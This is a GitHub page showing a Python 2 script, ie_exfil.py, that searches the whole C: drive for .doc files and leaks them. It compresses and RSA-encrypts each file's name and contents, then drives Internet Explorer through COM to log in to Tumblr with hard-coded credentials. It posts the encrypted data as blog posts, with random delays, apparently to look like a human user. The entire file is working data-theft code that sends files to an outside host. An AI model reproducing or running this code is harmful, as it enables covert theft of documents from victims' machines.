-
Notifications
You must be signed in to change notification settings - Fork 2
/
ie_exfil.py
179 lines (128 loc) · 4.17 KB
/
ie_exfil.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
doc_type = ".doc"
username = "test@test.com"
password = "testpassword"
public_key = """
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtNhPAc2DGkLhgO1tFKNz
AhQA6jrVvmurRq4Q0W/AynT2J8Teb8il+Nsdf7rXcpywCJD3LaJ2Je5GZ9Vm1KTw
xVXHi6uarVfW1/kbot2Ahe0DL3+H7+22xGcGXYVE+q0I9MXLFcXOvx+PJkmJUFFi
YITfzHX4zUnX1yzznnKoyohBRC77m9EPM1dI2qTcwCWllXNnFi56DwVmTHmaFyvB
6xaKSifJtlZtjIuLc75Lc5V0xXgbOXCsU0k6iZPkCYNGsDu3/6GEvPlhM/BHzS2/
4tF7n2mJQXkKFrEk/YYC9QGSCzXhq4r3REwiZPH/hhzkGJ0OWYmqqWVhg9k4taBl
6wIDAQAB
-----END PUBLIC KEY-----"""
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
def encrypt_string(plaintext):
chunk_size = 256
print "Compressing: %d bytes" % len(plaintext)
plaintext = zlib.compress(plaintext)
print "Encrypting %d bytes" % len(plaintext)
rsakey = RSA.importKey(public_key)
rsakey = PKCS1_OAEP.new(rsakey)
encrypted = ""
offset = 0
while offset < len(plaintext):
chunk = plaintext[offset:offset+256]
if len(chunk) % chunk_size != 0:
chunk += " " * (chunk_size - len(chunk))
encrypted += rsakey.encrypt(chunk)
offset += chunk_size
encrypted = encrypted.encode("base64")
print "Base64 encoded crypto: %d" % len(encrypted)
return encrypted
def encrypt_post(filename):
# open and read the file
fd = open(filename,"rb")
contents = fd.read()
fd.close()
encrypted_title = encrypt_string(filename)
encrypted_body = encrypt_string(contents)
return encrypted_title,encrypted_body
def random_sleep():
time.sleep(random.randint(5,10))
return
def login_to_tumblr(ie):
# retrieve all elements in the document
full_doc = ie.Document.all
# iterate looking for the logout form
for i in full_doc:
if i.id == "signup_email":
i.setAttribute("value",username)
elif i.id == "signup_password":
i.setAttribute("value",password)
random_sleep()
# you can be presented with different homepages
try:
if ie.Document.forms[0].id == "signup_form":
ie.Document.forms[0].submit()
else:
ie.Document.forms[1].submit()
except IndexError, e:
pass
random_sleep()
# the login form is the second form on the page
wait_for_browser(ie)
return
def post_to_tumblr(ie,title,post):
full_doc = ie.Document.all
for i in full_doc:
if i.id == "post_one":
i.setAttribute("value",title)
title_box = i
i.focus()
elif i.id == "post_two":
i.setAttribute("innerHTML",post)
print "Set text area"
i.focus()
elif i.id == "create_post":
print "Found post button"
post_form = i
i.focus()
# move focus away from the main content box
random_sleep()
title_box.focus()
random_sleep()
# post the form
post_form.children[0].click()
wait_for_browser(ie)
random_sleep()
return
def exfiltrate(document_path):
ie = win32com.client.Dispatch("InternetExplorer.Application")
ie.Visible = 1
# head to tumblr and login
ie.Navigate("http://www.tumblr.com/login")
wait_for_browser(ie)
print "Logging in..."
login_to_tumblr(ie)
print "Logged in...navigating"
ie.Navigate("https://www.tumblr.com/new/text")
wait_for_browser(ie)
# encrypt the file
title,body = encrypt_post(document_path)
print "Creating new post..."
post_to_tumblr(ie,title,body)
print "Posted!"
# Destroy the IE instance
ie.Quit()
ie = None
return
# main loop for document discovery
for parent, directories, filenames in os.walk("C:\\"):
for filename in fnmatch.filter(filenames,"*%s" % doc_type):
document_path = os.path.join(parent,filename)
print "Found: %s" % document_path
exfiltrate(document_path)
raw_input("Continue?")